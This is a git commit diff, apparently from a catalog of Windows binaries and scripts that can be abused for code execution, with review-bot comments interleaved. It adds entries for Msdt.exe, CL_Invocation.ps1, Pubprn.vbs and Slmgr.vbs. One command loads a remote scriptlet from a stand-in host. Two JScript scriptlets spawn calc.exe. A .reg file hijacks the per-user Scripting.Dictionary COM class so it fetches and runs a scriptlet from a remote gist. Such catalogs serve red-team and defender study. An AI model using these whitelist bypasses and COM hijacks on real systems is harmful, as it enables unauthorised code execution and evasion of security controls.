Added more in new structure
parent
e4b37b00ef
commit
0eb4ec64e3
|
@ -0,0 +1,29 @@
|
|||
Template
|
||||
|
||||
## Binary.exe
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
Example
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Name of guy - @twitterhandle
|
||||
|
||||
Code sample:
|
||||
* [NameOfLink](Payload/NameOfPayload)
|
||||
|
||||
Resources:
|
||||
* https://linktosomethingusefull.com
|
||||
|
||||
Full path:
|
||||
```
|
||||
c:\windows\system32\binary.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
Some specific details about the binary file.
|
||||
|
||||
|
||||
|
|
@ -15,6 +15,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
|
|||
[Installutil.exe](OSBinaries/Installutil.md)
|
||||
[Mavinject32.exe](OSBinaries/Mavinject32.md)
|
||||
[Msbuild.exe](OSBinaries/Msbuild.md)
|
||||
[Msdt.exe](OSBinaries/Msdt.md)
|
||||
[Mshta.exe](OSBinaries/Mshta.md)
|
||||
[Msiexec.exe](OSBinaries/Msiexec.md)
|
||||
[Odbcconf.exe](OSBinaries/Odbcconf.md)
|
||||
|
|
|
@ -5,3 +5,4 @@ If you are missing from the acknowledgement, please let me know (I did not forge
|
|||
|
||||
# OS SCRIPTS
|
||||
|
||||
[Cl_invocation](OSScripts/Cl_invocation.md)
|
|
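Review bot: The new index entry `[Cl_invocation](OSScripts/Cl_invocation.md)` departs from the naming used by the other entries, which carry the binary or script name with its extension (for example `[Msdt.exe](OSBinaries/Msdt.md)`), and its casing differs from the `## CL_Invocation.ps1` heading added elsewhere in this commit. If the new file is actually named `CL_Invocation.md`, this link will break on case-sensitive hosting; please confirm the on-disk name and align both link text and target with it, e.g. `[CL_Invocation.ps1](OSScripts/CL_Invocation.md)` if that is the real filename.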
@ -0,0 +1,15 @@
|
|||
## Msdt.exe
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
Open .diagcab package
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* ?
|
||||
|
||||
Resources:
|
||||
* https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
|
||||
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||
|
|
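Review bot: The Acknowledgements entry `* ?` is a placeholder that ships in the published page; either credit the authors of the two linked resources or leave the section out until it can be filled. Compared with the Template added in this commit, this entry also lacks the `Full path:` and `Notes:` sections, so a reader cannot tell where the binary lives or what the .diagcab behaviour depends on; adding them, or stating that they are intentionally omitted, would keep the entries consistent. `Open .diagcab package` inside the code fence reads as a description rather than an invocation, so consider moving it to Notes or marking it as such.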
@ -0,0 +1,29 @@
|
|||
## CL_Invocation.ps1
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
. C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
|
||||
SyncInvoke <executable> [args]
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Jimmy - @bohops
|
||||
|
||||
Code sample:
|
||||
|
||||
|
||||
Resources:
|
||||
* https://twitter.com/bohops/status/948548812561436672
|
||||
|
||||
Full path:
|
||||
```
|
||||
C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
|
||||
```
|
||||
|
||||
Notes:
|
||||
|
||||
|
||||
|
||||
|
||||
|
|
@ -0,0 +1,29 @@
|
|||
## Pubprn.vbs
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Matt Nelson - @enigma0x3
|
||||
|
||||
Code sample:
|
||||
* [Pubprn_calc.sct](Payload/Pubprn_calc.sct)
|
||||
|
||||
Resources:
|
||||
* https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
|
||||
* https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
|
||||
|
||||
Full path:
|
||||
```
|
||||
C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
|
||||
C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
|
||||
```
|
||||
|
||||
Notes:
|
||||
|
||||
|
||||
|
||||
|
|
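Review bot: The example `pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct` uses `domain.com`, a live registered third-party domain, as its stand-in host; the Template uses an obviously fake host, and a reserved documentation domain avoids directing anyone who copies the example at a real site. Suggest `pubprn.vbs 127.0.0.1 script:https://example.com/folder/file.sct`, or a bracketed placeholder such as `<url-to-sct>`. The `Notes:` section is left empty; either describe what the entry depends on or drop the heading so the page does not end with an empty section.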
@ -0,0 +1,30 @@
|
|||
## Slmgr.vbs
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
slmgr.vbs
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Matt Nelson - @enigma0x3
|
||||
* Casey Smith - @subtee
|
||||
|
||||
Code sample:
|
||||
* [NameOfLink](Payload/NameOfPayload)
|
||||
|
||||
Resources:
|
||||
* https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
|
||||
* https://www.youtube.com/watch?v=3gz1QmiMhss
|
||||
|
||||
Full path:
|
||||
```
|
||||
c:\windows\system32\slmgr.vbs
|
||||
c:\windows\sysWOW64\slmgr.vbs
|
||||
```
|
||||
|
||||
Notes:
|
||||
Requires registry keys to work.
|
||||
|
||||
|
||||
|
|
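Review bot: The Code sample line `* [NameOfLink](Payload/NameOfPayload)` is the unfilled placeholder from the Template, so the published page links to a file that does not exist; point it at the actual payload or remove the line. The note `Requires registry keys to work.` does not say which keys — if the `HKEY_CURRENT_USER\Software\Classes` `Scripting.Dictionary` registration in the .reg file added by this commit is what is meant, name that file here and state that importing it changes COM class resolution for the current user, since that is both the precondition and the observable side effect a reader or defender would look for. The code fence containing only `slmgr.vbs` does not show how the script is invoked; consider stating the invocation explicitly or describing the trigger in Notes.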
@ -0,0 +1,22 @@
|
|||
<?XML version="1.0"?>
|
||||
<scriptlet>
|
||||
|
||||
<registration
|
||||
description="Bandit"
|
||||
progid="Bandit"
|
||||
version="1.00"
|
||||
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
|
||||
remotable="true"
|
||||
>
|
||||
</registration>
|
||||
|
||||
<script language="JScript">
|
||||
<![CDATA[
|
||||
|
||||
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||||
|
||||
|
||||
]]>
|
||||
</script>
|
||||
|
||||
</scriptlet>
|
|
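Review bot: `<?XML version="1.0"?>` is not a valid XML declaration — the declaration target `xml` is reserved and case-sensitive, so strict parsers and any XML linting in CI will reject the file even though the Windows scriptlet host is lenient; use `<?xml version="1.0"?>`. The same issue, and the `var r =` assignment whose value is never read, appear in the second scriptlet at the end of this commit (the `Scripting.Dictionary` registration). Both scriptlets also declare the same `classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"` under different progids while the .reg file in this commit maps `{00000001-0000-0000-0000-0000FEEDACDC}`; a one-line comment in each CDATA block saying which entry it belongs to (e.g. `// Proof-of-concept scriptlet for the Pubprn.vbs entry; launches calc.exe` if that is the intended pairing — please confirm) would make the pairing explicit.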
@ -0,0 +1,24 @@
|
|||
Windows Registry Editor Version 5.00
|
||||
|
||||
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary]
|
||||
@=""
|
||||
|
||||
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary\CLSID]
|
||||
@="{00000001-0000-0000-0000-0000FEEDACDC}"
|
||||
|
||||
|
||||
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
|
||||
@="Scripting.Dictionary"
|
||||
|
||||
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
|
||||
@="C:\\WINDOWS\\system32\\scrobj.dll"
|
||||
"ThreadingModel"="Apartment"
|
||||
|
||||
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
|
||||
@="Scripting.Dictionary"
|
||||
|
||||
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
|
||||
@="https://gist.githubusercontent.com/enigma0x3/4373e9a63aaebe177c747af9bc6da743/raw/2207d8a1a536371aff5f61c8bef8400622868976/wee.png"
|
||||
|
||||
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
|
||||
@="Scripting.Dictionary"
|
|
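Review bot: The file redirects the per-user `Scripting.Dictionary` ProgID and a CLSID under `HKEY_CURRENT_USER\Software\Classes` to `scrobj.dll` with a `ScriptletURL` that points at a pinned revision of a third-party gist the project does not control, and nothing in the file says so or which entry it belongs to. `.reg` files accept `;` comment lines, so a short header would help, for instance `; Per-user COM registration used by the Slmgr.vbs entry: points the Scripting.Dictionary ProgID at scrobj.dll with a remote ScriptletURL` — I infer Slmgr.vbs from its "Requires registry keys" note; please confirm. From a defensive standpoint, creation of a `ScriptletURL` value under `HKEY_CURRENT_USER\Software\Classes\CLSID` is an observable registry event worth mentioning in that entry's Notes.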
@ -0,0 +1,22 @@
|
|||
<?XML version="1.0"?>
|
||||
<scriptlet>
|
||||
|
||||
<registration
|
||||
description="Scripting.Dictionary"
|
||||
progid="Scripting.Dictionary"
|
||||
version="1"
|
||||
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
|
||||
remotable="true"
|
||||
>
|
||||
</registration>
|
||||
|
||||
<script language="JScript">
|
||||
<![CDATA[
|
||||
|
||||
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||||
|
||||
|
||||
]]>
|
||||
</script>
|
||||
|
||||
</scriptlet>
|